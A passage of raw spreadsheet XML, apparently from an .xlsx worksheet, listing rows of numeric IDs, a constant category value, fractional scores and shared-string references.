      </c>
      <c r="H6963" t="s">
        <v>13774</v>
      </c>
    </row>
    <row r="6964" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6964" s="1">
        <v>6962</v>
      </c>
      <c r="B6964">
        <v>7497</v>
      </c>
      <c r="C6964">
        <v>7497</v>
      </c>
      <c r="D6964">
        <v>4</v>
      </c>
      <c r="E6964">
        <v>0.65640002489089966</v>
      </c>
      <c r="F6964" t="s">
        <v>13461</v>
      </c>
      <c r="G6964" t="s">
        <v>13775</v>
      </c>
      <c r="H6964" t="s">
        <v>13776</v>
      </c>
    </row>
    <row r="6965" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6965" s="1">
        <v>6963</v>
      </c>
      <c r="B6965">
        <v>829</v>
      </c>
      <c r="C6965">
        <v>829</v>
      </c>
      <c r="D6965">
        <v>4</v>
      </c>
      <c r="E6965">
        <v>0.68639999628067017</v>
      </c>
      <c r="F6965" t="s">
        <v>13461</v>
      </c>
      <c r="G6965" t="s">
        <v>13777</v>
      </c>
      <c r="H6965" t="s">
        <v>13778</v>
      </c>
    </row>
    <row r="6966" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6966" s="1">
        <v>6964</v>
      </c>
      <c r="B6966">
        <v>7696</v>
      </c>
      <c r="C6966">
        <v>7696</v>
      </c>
      <c r="D6966">
        <v>4</v>
      </c>
      <c r="E6966">
        <v>0.93300002813339233</v>
      </c>
      <c r="F6966" t="s">
        <v>13461</v>
      </c>
      <c r="G6966" t="s">
        <v>13779</v>
      </c>
      <c r="H6966" t="s">
        <v>13780</v>
      </c>
    </row>
    <row r="6967" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6967" s="1">
        <v>6965</v>
      </c>
      <c r="B6967">
        <v>7695</v>
      </c>
      <c r="C6967">
        <v>7695</v>
      </c>
      <c r="D6967">
        <v>4</v>
      </c>
      <c r="E6967">
        <v>0.53189998865127563</v>
      </c>
      <c r="F6967" t="s">
        <v>13461</v>
      </c>
      <c r="G6967" t="s">
        <v>13781</v>
      </c>
      <c r="H6967" t="s">
        <v>13782</v>
      </c>
    </row>
    <row r="6968" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6968" s="1">
        <v>6966</v>
      </c>
      <c r="B6968">
        <v>516</v>
      </c>
      <c r="C6968">
        <v>516</v>
      </c>
      <c r="D6968">
        <v>4</v>
      </c>
      <c r="E6968">
        <v>0.51899999380111694</v>
      </c>
      <c r="F6968" t="s">
        <v>13461</v>
      </c>
      <c r="G6968" t="s">
        <v>13783</v>
      </c>
      <c r="H6968" t="s">
        <v>13784</v>
      </c>
    </row>
    <row r="6969" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6969" s="1">
        <v>6967</v>
      </c>
      <c r="B6969">
        <v>7581</v>
      </c>
      <c r="C6969">
        <v>7581</v>
      </c>
      <c r="D6969">
        <v>4</v>
      </c>
      <c r="E6969">
        <v>0.45669999718666082</v>
      </c>
      <c r="F6969" t="s">
        <v>13461</v>
      </c>
      <c r="G6969" t="s">
        <v>13785</v>
      </c>
      <c r="H6969" t="s">
        <v>13786</v>
      </c>
    </row>
    <row r="6970" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6970" s="1">
        <v>6968</v>
      </c>
      <c r="B6970">
        <v>738</v>
      </c>
      <c r="C6970">
        <v>738</v>
      </c>
      <c r="D6970">
        <v>4</v>
      </c>
      <c r="E6970">
        <v>0.61669999361038208</v>
      </c>
      <c r="F6970" t="s">
        <v>13461</v>
      </c>
      <c r="G6970" t="s">
        <v>13787</v>
      </c>
      <c r="H6970" t="s">
        <v>13788</v>
      </c>
    </row>
    <row r="6971" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6971" s="1">
        <v>6969</v>
      </c>
      <c r="B6971">
        <v>614</v>
      </c>
      <c r="C6971">
        <v>614</v>
      </c>
      <c r="D6971">
        <v>4</v>
      </c>
      <c r="E6971">
        <v>0.66780000925064087</v>
      </c>
      <c r="F6971" t="s">
        <v>13461</v>
      </c>
      <c r="G6971" t="s">
        <v>13789</v>
      </c>
      <c r="H6971" t="s">
        <v>13790</v>
      </c>
    </row>
    <row r="6972" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6972" s="1">
        <v>6970</v>
      </c>
      <c r="B6972">
        <v>732</v>
      </c>
      <c r="C6972">
        <v>732</v>
      </c>
      <c r="D6972">
        <v>4</v>
      </c>
      <c r="E6972">
        <v>0.8619999885559082</v>
      </c>
      <c r="F6972" t="s">
        <v>13461</v>
      </c>
      <c r="G6972" t="s">
        <v>13791</v>
      </c>
      <c r="H6972" t="s">
        <v>13792</v>
      </c>
    </row>
    <row r="6973" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6973" s="1">
        <v>6971</v>
      </c>
      <c r="B6973">
        <v>618</v>
      </c>
      <c r="C6973">
        <v>618</v>
      </c>
      <c r="D6973">
        <v>4</v>
      </c>
      <c r="E6973">
        <v>0.49540001153945917</v>
      </c>
      <c r="F6973" t="s">
        <v>13461</v>
      </c>
      <c r="G6973" t="s">
        <v>13793</v>
      </c>
      <c r="H6973" t="s">
        <v>13794</v>
      </c>
    </row>
    <row r="6974" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6974" s="1">
        <v>6972</v>
      </c>
      <c r="B6974">
        <v>719</v>
      </c>
      <c r="C6974">
        <v>719</v>
      </c>
      <c r="D6974">
        <v>4</v>
      </c>
      <c r="E6974">
        <v>0.51340001821517944</v>
      </c>
      <c r="F6974" t="s">
        <v>13461</v>
      </c>
      <c r="G6974" t="s">
        <v>13795</v>
      </c>
      <c r="H6974" t="s">
        <v>13796</v>
      </c>
    </row>
    <row r="6975" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6975" s="1">
        <v>6973</v>
      </c>
      <c r="B6975">
        <v>619</v>
      </c>
      <c r="C6975">
        <v>619</v>
      </c>
      <c r="D6975">
        <v>4</v>
      </c>
      <c r="E6975">
        <v>0.97549998760223389</v>
      </c>
      <c r="F6975" t="s">
        <v>13461</v>
      </c>
      <c r="G6975" t="s">
        <v>13797</v>
      </c>
      <c r="H6975" t="s">
        <v>13798</v>
      </c>
    </row>
    <row r="6976" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6976" s="1">
        <v>6974</v>
      </c>
      <c r="B6976">
        <v>716</v>
      </c>
      <c r="C6976">
        <v>716</v>
      </c>
      <c r="D6976">
        <v>4</v>
      </c>
      <c r="E6976">
        <v>0.52359998226165771</v>
      </c>
      <c r="F6976" t="s">
        <v>13461</v>
      </c>
      <c r="G6976" t="s">
        <v>13799</v>
      </c>
      <c r="H6976" t="s">
        <v>13800</v>
      </c>
    </row>
    <row r="6977" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6977" s="1">
        <v>6975</v>
      </c>
      <c r="B6977">
        <v>715</v>
      </c>
      <c r="C6977">
        <v>715</v>
      </c>
      <c r="D6977">
        <v>4</v>
      </c>
      <c r="E6977">
        <v>0.64259999990463257</v>
      </c>
      <c r="F6977" t="s">
        <v>13461</v>
      </c>
      <c r="G6977" t="s">
        <v>13801</v>
      </c>
      <c r="H6977" t="s">
        <v>13802</v>
      </c>
    </row>
    <row r="6978" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6978" s="1">
        <v>6976</v>
      </c>
      <c r="B6978">
        <v>622</v>
      </c>
      <c r="C6978">
        <v>622</v>
      </c>
      <c r="D6978">
        <v>4</v>
      </c>
      <c r="E6978">
        <v>0.97289997339248657</v>
      </c>
      <c r="F6978" t="s">
        <v>13461</v>
      </c>
      <c r="G6978" t="s">
        <v>13803</v>
      </c>
      <c r="H6978" t="s">
        <v>13804</v>
      </c>
    </row>
    <row r="6979" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6979" s="1">
        <v>6977</v>
      </c>
      <c r="B6979">
        <v>625</v>
      </c>
      <c r="C6979">
        <v>625</v>
      </c>
      <c r="D6979">
        <v>4</v>
      </c>
      <c r="E6979">
        <v>0.69429999589920044</v>
      </c>
      <c r="F6979" t="s">
        <v>13461</v>
      </c>
      <c r="G6979" t="s">
        <v>13805</v>
      </c>
      <c r="H6979" t="s">
        <v>13806</v>
      </c>
    </row>
    <row r="6980" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6980" s="1">
        <v>6978</v>
      </c>
      <c r="B6980">
        <v>627</v>
      </c>
      <c r="C6980">
        <v>627</v>
      </c>
      <c r="D6980">
        <v>4</v>
      </c>
      <c r="E6980">
        <v>0.75190001726150513</v>
      </c>
      <c r="F6980" t="s">
        <v>13461</v>
      </c>
      <c r="G6980" t="s">
        <v>13807</v>
      </c>
      <c r="H6980" t="s">
        <v>13808</v>
      </c>
    </row>
    <row r="6981" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6981" s="1">
        <v>6979</v>
      </c>
      <c r="B6981">
        <v>7648</v>
      </c>
      <c r="C6981">
        <v>7648</v>
      </c>
      <c r="D6981">
        <v>4</v>
      </c>
      <c r="E6981">
        <v>0.76880002021789551</v>
      </c>
      <c r="F6981" t="s">
        <v>13461</v>
      </c>
      <c r="G6981" t="s">
        <v>13809</v>
      </c>
      <c r="H6981" t="s">
        <v>13810</v>
      </c>
    </row>
    <row r="6982" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6982" s="1">
        <v>6980</v>
      </c>
      <c r="B6982">
        <v>704</v>
      </c>
      <c r="C6982">
        <v>704</v>
      </c>
      <c r="D6982">
        <v>4</v>
      </c>
      <c r="E6982">
        <v>0.40049999952316279</v>
      </c>
      <c r="F6982" t="s">
        <v>13461</v>
      </c>
      <c r="G6982" t="s">
        <v>13811</v>
      </c>
      <c r="H6982" t="s">
        <v>13812</v>
      </c>
    </row>
    <row r="6983" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6983" s="1">
        <v>6981</v>
      </c>
      <c r="B6983">
        <v>647</v>
      </c>
      <c r="C6983">
        <v>647</v>
      </c>
      <c r="D6983">
        <v>4</v>
      </c>
      <c r="E6983">
        <v>0.54170000553131104</v>
      </c>
      <c r="F6983" t="s">
        <v>13461</v>
      </c>
      <c r="G6983" t="s">
        <v>13813</v>
      </c>
      <c r="H6983" t="s">
        <v>13814</v>
      </c>
    </row>
    <row r="6984" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6984" s="1">
        <v>6982</v>
      </c>
      <c r="B6984">
        <v>7607</v>
      </c>
      <c r="C6984">
        <v>7607</v>
      </c>
      <c r="D6984">
        <v>4</v>
      </c>
      <c r="E6984">
        <v>0.82279998064041138</v>
      </c>
      <c r="F6984" t="s">
        <v>13461</v>
      </c>
      <c r="G6984" t="s">
        <v>13815</v>
      </c>
      <c r="H6984" t="s">
        <v>13816</v>
      </c>
    </row>
    <row r="6985" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6985" s="1">
        <v>6983</v>
      </c>
      <c r="B6985">
        <v>7608</v>
      </c>
      <c r="C6985">
        <v>7608</v>
      </c>
      <c r="D6985">
        <v>4</v>
      </c>
      <c r="E6985">
        <v>0.99750000238418579</v>
      </c>
      <c r="F6985" t="s">
        <v>13461</v>
      </c>
      <c r="G6985" t="s">
        <v>13817</v>
      </c>
      <c r="H6985" t="s">
        <v>13818</v>
      </c>
    </row>
    <row r="6986" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6986" s="1">
        <v>6984</v>
      </c>
      <c r="B6986">
        <v>648</v>
      </c>
      <c r="C6986">
        <v>648</v>
      </c>
      <c r="D6986">
        <v>4</v>
      </c>
      <c r="E6986">
        <v>0.99360001087188721</v>
      </c>
      <c r="F6986" t="s">
        <v>13461</v>
      </c>
      <c r="G6986" t="s">
        <v>13819</v>
      </c>
      <c r="H6986" t="s">
        <v>13820</v>
      </c>
    </row>
    <row r="6987" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6987" s="1">
        <v>6985</v>
      </c>
      <c r="B6987">
        <v>653</v>
      </c>
      <c r="C6987">
        <v>653</v>
      </c>
      <c r="D6987">
        <v>4</v>
      </c>
      <c r="E6987">
        <v>0.70550000667572021</v>
      </c>
      <c r="F6987" t="s">
        <v>13461</v>
      </c>
      <c r="G6987" t="s">
        <v>13821</v>
      </c>
      <c r="H6987" t="s">
        <v>13822</v>
      </c>
    </row>
    <row r="6988" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6988" s="1">
        <v>6986</v>
      </c>
      <c r="B6988">
        <v>695</v>
      </c>
      <c r="C6988">
        <v>695</v>
      </c>
      <c r="D6988">
        <v>4</v>
      </c>
      <c r="E6988">
        <v>0.56629997491836548</v>
      </c>
      <c r="F6988" t="s">
        <v>13461</v>
      </c>
      <c r="G6988" t="s">
        <v>13823</v>
      </c>
      <c r="H6988" t="s">
        <v>13824</v>
      </c>
    </row>
    <row r="6989" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6989" s="1">
        <v>6987</v>
      </c>
      <c r="B6989">
        <v>7611</v>
      </c>
      <c r="C6989">
        <v>7611</v>
      </c>
      <c r="D6989">
        <v>4</v>
      </c>
      <c r="E6989">
        <v>0.4814000129699707</v>
      </c>
      <c r="F6989" t="s">
        <v>13461</v>
      </c>
      <c r="G6989" t="s">
        <v>13825</v>
      </c>
      <c r="H6989" t="s">
        <v>13826</v>
      </c>
    </row>
    <row r="6990" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6990" s="1">
        <v>6988</v>
      </c>
      <c r="B6990">
        <v>663</v>
      </c>
      <c r="C6990">
        <v>663</v>
      </c>
      <c r="D6990">
        <v>4</v>
      </c>
      <c r="E6990">
        <v>0.39759999513626099</v>
      </c>
      <c r="F6990" t="s">
        <v>13461</v>
      </c>
      <c r="G6990" t="s">
        <v>13827</v>
      </c>
      <c r="H6990" t="s">
        <v>13828</v>
      </c>
    </row>
    <row r="6991" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6991" s="1">
        <v>6989</v>
      </c>
      <c r="B6991">
        <v>665</v>
      </c>
      <c r="C6991">
        <v>665</v>
      </c>
      <c r="D6991">
        <v>4</v>
      </c>
      <c r="E6991">
        <v>0.56840002536773682</v>
      </c>
      <c r="F6991" t="s">
        <v>13461</v>
      </c>
      <c r="G6991" t="s">
        <v>13829</v>
      </c>
      <c r="H6991" t="s">
        <v>13830</v>
      </c>
    </row>
    <row r="6992" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6992" s="1">
        <v>6990</v>
      </c>
      <c r="B6992">
        <v>666</v>
      </c>
      <c r="C6992">
        <v>666</v>
      </c>
      <c r="D6992">
        <v>4</v>
      </c>
      <c r="E6992">
        <v>0.97210001945495605</v>
      </c>
      <c r="F6992" t="s">
        <v>13461</v>
      </c>
      <c r="G6992" t="s">
        <v>13831</v>
      </c>
      <c r="H6992" t="s">
        <v>13832</v>
      </c>
    </row>
    <row r="6993" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6993" s="1">
        <v>6991</v>
      </c>
      <c r="B6993">
        <v>7635</v>
      </c>
      <c r="C6993">
        <v>7635</v>
      </c>
      <c r="D6993">
        <v>4</v>
      </c>
      <c r="E6993">
        <v>0.5593000054359436</v>
      </c>
      <c r="F6993" t="s">
        <v>13461</v>
      </c>
      <c r="G6993" t="s">
        <v>13833</v>
      </c>
      <c r="H6993" t="s">
        <v>13834</v>
      </c>
    </row>
    <row r="6994" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6994" s="1">
        <v>6992</v>
      </c>
      <c r="B6994">
        <v>668</v>
      </c>
      <c r="C6994">
        <v>668</v>
      </c>
      <c r="D6994">
        <v>4</v>
      </c>
      <c r="E6994">
        <v>0.65750002861022949</v>
      </c>
      <c r="F6994" t="s">
        <v>13461</v>
      </c>
      <c r="G6994" t="s">
        <v>13835</v>
      </c>
      <c r="H6994" t="s">
        <v>13836</v>
      </c>
    </row>
    <row r="6995" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6995" s="1">
        <v>6993</v>
      </c>
      <c r="B6995">
        <v>673</v>
      </c>
      <c r="C6995">
        <v>673</v>
      </c>
      <c r="D6995">
        <v>4</v>
      </c>
      <c r="E6995">
        <v>0.51419997215270996</v>
      </c>
      <c r="F6995" t="s">
        <v>13461</v>
      </c>
      <c r="G6995" t="s">
        <v>13837</v>
      </c>
      <c r="H6995" t="s">
        <v>13838</v>
      </c>
    </row>
    <row r="6996" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6996" s="1">
        <v>6994</v>
      </c>
      <c r="B6996">
        <v>7629</v>
      </c>
      <c r="C6996">
        <v>7629</v>
      </c>
      <c r="D6996">
        <v>4</v>
      </c>
      <c r="E6996">
        <v>0.55970001220703125</v>
      </c>
      <c r="F6996" t="s">
        <v>13461</v>
      </c>
      <c r="G6996" t="s">
        <v>13839</v>
      </c>
      <c r="H6996" t="s">
        <v>13840</v>
      </c>
    </row>
    <row r="6997" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6997" s="1">
        <v>6995</v>
      </c>
      <c r="B6997">
        <v>7627</v>
      </c>
      <c r="C6997">
        <v>7627</v>
      </c>
      <c r="D6997">
        <v>4</v>
      </c>
      <c r="E6997">
        <v>0.97089999914169312</v>
      </c>
      <c r="F6997" t="s">
        <v>13461</v>
      </c>
      <c r="G6997" t="s">
        <v>13841</v>
      </c>
      <c r="H6997" t="s">
        <v>13842</v>
      </c>
    </row>
    <row r="6998" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6998" s="1">
        <v>6996</v>
      </c>
      <c r="B6998">
        <v>600</v>
      </c>
      <c r="C6998">
        <v>600</v>
      </c>
      <c r="D6998">
        <v>4</v>
      </c>
      <c r="E6998">
        <v>0.8091999888420105</v>
      </c>
      <c r="F6998" t="s">
        <v>13461</v>
      </c>
      <c r="G6998" t="s">
        <v>13843</v>
      </c>
      <c r="H6998" t="s">
        <v>13844</v>
      </c>
    </row>
    <row r="6999" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6999" s="1">
        <v>6997</v>
      </c>
      <c r="B6999">
        <v>400</v>
      </c>
      <c r="C6999">
        <v>400</v>
      </c>
      <c r="D6999">
        <v>4</v>
      </c>
      <c r="E6999">
        <v>0.41440001130104059</v>
      </c>
      <c r="F6999" t="s">
        <v>13461</v>
      </c>
      <c r="G6999" t="s">
        <v>13845</v>
      </c>
      <c r="H6999" t="s">
        <v>13846</v>
      </c>
    </row>
    <row r="7000" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7000" s="1">
        <v>6998</v>
      </c>
      <c r="B7000">
        <v>7663</v>
      </c>
      <c r="C7000">
        <v>7663</v>
      </c>
      <c r="D7000">
        <v>4</v>
      </c>
      <c r="E7000">
        <v>0.55970001220703125</v>
      </c>
      <c r="F7000" t="s">
        <v>13461</v>
      </c>
      <c r="G7000" t="s">
        <v>13847</v>
      </c>
      <c r="H7000" t="s">
        <v>13848</v>
      </c>
    </row>
    <row r="7001" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7001" s="1">
        <v>6999</v>
      </c>
      <c r="B7001">
        <v>597</v>
      </c>
      <c r="C7001">
        <v>597</v>
      </c>
      <c r="D7001">
        <v>4</v>
      </c>
      <c r="E7001">
        <v>0.99910002946853638</v>
      </c>
      <c r="F7001" t="s">
        <v>13461</v>
      </c>
      <c r="G7001" t="s">
        <v>13849</v>
      </c>
      <c r="H7001" t="s">
        <v>13850</v>
      </c>
    </row>
    <row r="7002" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7002" s="1">
        <v>7000</v>
      </c>
      <c r="B7002">
        <v>522</v>
      </c>
      <c r="C7002">
        <v>522</v>
      </c>
      <c r="D7002">
        <v>4</v>
      </c>
      <c r="E7002">
        <v>0.99800002574920654</v>
      </c>
      <c r="F7002" t="s">
        <v>13461</v>
      </c>
      <c r="G7002" t="s">
        <v>13851</v>
      </c>
      <c r="H7002" t="s">
        <v>13852</v>
      </c>
    </row>
    <row r="7003" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7003" s="1">
        <v>7001</v>
      </c>
      <c r="B7003">
        <v>525</v>
      </c>
      <c r="C7003">
        <v>525</v>
      </c>
      <c r="D7003">
        <v>4</v>
      </c>
      <c r="E7003">
        <v>0.46200001239776611</v>
      </c>
      <c r="F7003" t="s">
        <v>13461</v>
      </c>
      <c r="G7003" t="s">
        <v>13853</v>
      </c>
      <c r="H7003" t="s">
        <v>13854</v>
      </c>
    </row>
    <row r="7004" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7004" s="1">
        <v>7002</v>
      </c>
      <c r="B7004">
        <v>819</v>
      </c>
      <c r="C7004">
        <v>819</v>
      </c>
      <c r="D7004">
        <v>4</v>
      </c>
      <c r="E7004">
        <v>0.55900001525878906</v>
      </c>
      <c r="F7004" t="s">
        <v>13461</v>
      </c>
      <c r="G7004" t="s">
        <v>13855</v>
      </c>
      <c r="H7004" t="s">
        <v>13856</v>
      </c>
    </row>
    <row r="7005" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7005" s="1">
        <v>7003</v>
      </c>
      <c r="B7005">
        <v>529</v>
      </c>
      <c r="C7005">
        <v>529</v>
      </c>
      <c r="D7005">
        <v>4</v>
      </c>
      <c r="E7005">
        <v>0.53390002250671387</v>
      </c>
      <c r="F7005" t="s">
        <v>13461</v>
      </c>
      <c r="G7005" t="s">
        <v>13857</v>
      </c>
      <c r="H7005" t="s">
        <v>13858</v>
      </c>
    </row>
    <row r="7006" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7006" s="1">
        <v>7004</v>
      </c>
      <c r="B7006">
        <v>535</v>
      </c>
      <c r="C7006">
        <v>535</v>
      </c>
      <c r="D7006">
        <v>4</v>
      </c>
      <c r="E7006">
        <v>0.59869998693466187</v>
      </c>
      <c r="F7006" t="s">
        <v>13461</v>
      </c>
      <c r="G7006" t="s">
        <v>13859</v>
      </c>
      <c r="H7006" t="s">
        <v>13860</v>
      </c>
    </row>
    <row r="7007" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7007" s="1">
        <v>7005</v>
      </c>
      <c r="B7007">
        <v>536</v>
      </c>
      <c r="C7007">
        <v>536</v>
      </c>
      <c r="D7007">
        <v>4</v>
      </c>
      <c r="E7007">
        <v>0.81980001926422119</v>
      </c>
      <c r="F7007" t="s">
        <v>13461</v>
      </c>
      <c r="G7007" t="s">
        <v>13861</v>
      </c>
      <c r="H7007" t="s">
        <v>13862</v>
      </c>
    </row>
    <row r="7008" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7008" s="1">
        <v>7006</v>
      </c>
      <c r="B7008">
        <v>537</v>
      </c>
      <c r="C7008">
        <v>537</v>
      </c>
      <c r="D7008">
        <v>4</v>
      </c>
      <c r="E7008">
        <v>0.80659997463226318</v>
      </c>
      <c r="F7008" t="s">
        <v>13461</v>
      </c>
      <c r="G7008" t="s">
        <v>13863</v>
      </c>
      <c r="H7008" t="s">
        <v>13864</v>
      </c>
    </row>
    <row r="7009" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7009" s="1">
        <v>7007</v>
      </c>
      <c r="B7009">
        <v>7686</v>
      </c>
      <c r="C7009">
        <v>7686</v>
      </c>
      <c r="D7009">
        <v>4</v>
      </c>
      <c r="E7009">
        <v>0.6380000114440918</v>
      </c>
      <c r="F7009" t="s">
        <v>13461</v>
      </c>
      <c r="G7009" t="s">
        <v>13865</v>
      </c>
      <c r="H7009" t="s">
        <v>13866</v>
      </c>
    </row>
    <row r="7010" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7010" s="1">
        <v>7008</v>
      </c>
      <c r="B7010">
        <v>538</v>
      </c>
      <c r="C7010">
        <v>538</v>
      </c>
      <c r="D7010">
        <v>4</v>
      </c>
      <c r="E7010">
        <v>0.56950002908706665</v>
      </c>
      <c r="F7010" t="s">
        <v>13461</v>
      </c>
      <c r="G7010" t="s">
        <v>13867</v>
      </c>
      <c r="H7010" t="s">
        <v>13868</v>
      </c>
    </row>
    <row r="7011" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7011" s="1">
        <v>7009</v>
      </c>
      <c r="B7011">
        <v>7547</v>
      </c>
      <c r="C7011">
        <v>7547</v>
      </c>
      <c r="D7011">
        <v>4</v>
      </c>
      <c r="E7011">
        <v>0.46790000796318049</v>
      </c>
      <c r="F7011" t="s">
        <v>13461</v>
      </c>
      <c r="G7011" t="s">
        <v>13869</v>
      </c>
      <c r="H7011" t="s">
        <v>13870</v>
      </c>
    </row>
    <row r="7012" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7012" s="1">
        <v>7010</v>
      </c>
      <c r="B7012">
        <v>800</v>
      </c>
      <c r="C7012">
        <v>800</v>
      </c>
      <c r="D7012">
        <v>4</v>
      </c>
      <c r="E7012">
        <v>0.99930000305175781</v>
      </c>
      <c r="F7012" t="s">
        <v>13461</v>
      </c>
      <c r="G7012" t="s">
        <v>13871</v>
      </c>
      <c r="H7012" t="s">
        <v>13872</v>
      </c>
    </row>
    <row r="7013" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7013" s="1">
        <v>7011</v>
      </c>
      <c r="B7013">
        <v>799</v>
      </c>
      <c r="C7013">
        <v>799</v>
      </c>
      <c r="D7013">
        <v>4</v>
      </c>
      <c r="E7013">
        <v>0.99779999256134033</v>
      </c>
      <c r="F7013" t="s">
        <v>13461</v>
      </c>
      <c r="G7013" t="s">
        <v>13873</v>
      </c>
      <c r="H7013" t="s">
        <v>13874</v>
      </c>
    </row>
    <row r="7014" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7014" s="1">
        <v>7012</v>
      </c>
      <c r="B7014">
        <v>798</v>
      </c>
      <c r="C7014">
        <v>798</v>
      </c>
      <c r="D7014">
        <v>4</v>
      </c>
      <c r="E7014">
        <v>0.99720001220703125</v>
      </c>
      <c r="F7014" t="s">
        <v>13461</v>
      </c>
      <c r="G7014" t="s">
        <v>13875</v>
      </c>
      <c r="H7014" t="s">
        <v>13876</v>
      </c>
    </row>
    <row r="7015" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7015" s="1">
        <v>7013</v>
      </c>
      <c r="B7015">
        <v>558</v>
      </c>
      <c r="C7015">
        <v>558</v>
      </c>
      <c r="D7015">
        <v>4</v>
      </c>
      <c r="E7015">
        <v>0.70740002393722534</v>
      </c>
      <c r="F7015" t="s">
        <v>13461</v>
      </c>
      <c r="G7015" t="s">
        <v>13877</v>
      </c>
      <c r="H7015" t="s">
        <v>13878</v>
      </c>
    </row>
    <row r="7016" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7016" s="1">
        <v>7014</v>
      </c>
      <c r="B7016">
        <v>791</v>
      </c>
      <c r="C7016">
        <v>791</v>
      </c>
      <c r="D7016">
        <v>4</v>
      </c>
      <c r="E7016">
        <v>0.43450000882148743</v>
      </c>
      <c r="F7016" t="s">
        <v>13461</v>
      </c>
      <c r="G7016" t="s">
        <v>13879</v>
      </c>
      <c r="H7016" t="s">
        <v>13880</v>
      </c>
    </row>
    <row r="7017" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7017" s="1">
        <v>7015</v>
      </c>
      <c r="B7017">
        <v>782</v>
      </c>
      <c r="C7017">
        <v>782</v>
      </c>
      <c r="D7017">
        <v>4</v>
      </c>
      <c r="E7017">
        <v>0.98180001974105835</v>
      </c>
      <c r="F7017" t="s">
        <v>13461</v>
      </c>
      <c r="G7017" t="s">
        <v>13881</v>
      </c>
      <c r="H7017" t="s">
        <v>13882</v>
      </c>
    </row>
    <row r="7018" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7018" s="1">
        <v>7016</v>
      </c>
      <c r="B7018">
        <v>778</v>
      </c>
      <c r="C7018">
        <v>778</v>
      </c>
      <c r="D7018">
        <v>4</v>
      </c>
      <c r="E7018">
        <v>0.9814000129699707</v>
      </c>
      <c r="F7018" t="s">
        <v>13461</v>
      </c>
      <c r="G7018" t="s">
        <v>13883</v>
      </c>
      <c r="H7018" t="s">
        <v>13884</v>
      </c>
    </row>
    <row r="7019" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7019" s="1">
        <v>7017</v>
      </c>
      <c r="B7019">
        <v>7560</v>
      </c>
      <c r="C7019">
        <v>7560</v>
      </c>
      <c r="D7019">
        <v>4</v>
      </c>
      <c r="E7019">
        <v>0.69749999046325684</v>
      </c>
      <c r="F7019" t="s">
        <v>13461</v>
      </c>
      <c r="G7019" t="s">
        <v>13885</v>
      </c>
      <c r="H7019" t="s">
        <v>13886</v>
      </c>
    </row>
    <row r="7020" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7020" s="1">
        <v>7018</v>
      </c>
      <c r="B7020">
        <v>570</v>
      </c>
      <c r="C7020">
        <v>570</v>
      </c>
      <c r="D7020">
        <v>4</v>
      </c>
      <c r="E7020">
        <v>0.96359997987747192</v>
      </c>
      <c r="F7020" t="s">
        <v>13461</v>
      </c>
      <c r="G7020" t="s">
        <v>13887</v>
      </c>
      <c r="H7020" t="s">
        <v>13888</v>
      </c>
    </row>
    <row r="7021" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7021" s="1">
        <v>7019</v>
      </c>
      <c r="B7021">
        <v>777</v>
      </c>
      <c r="C7021">
        <v>777</v>
      </c>
      <c r="D7021">
        <v>4</v>
      </c>
      <c r="E7021">
        <v>0.99870002269744873</v>
      </c>
      <c r="F7021" t="s">
        <v>13461</v>
      </c>
      <c r="G7021" t="s">
        <v>13889</v>
      </c>
      <c r="H7021" t="s">
        <v>13890</v>
      </c>
    </row>
    <row r="7022" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7022" s="1">
        <v>7020</v>
      </c>
      <c r="B7022">
        <v>7562</v>
      </c>
      <c r="C7022">
        <v>7562</v>
      </c>
      <c r="D7022">
        <v>4</v>
      </c>
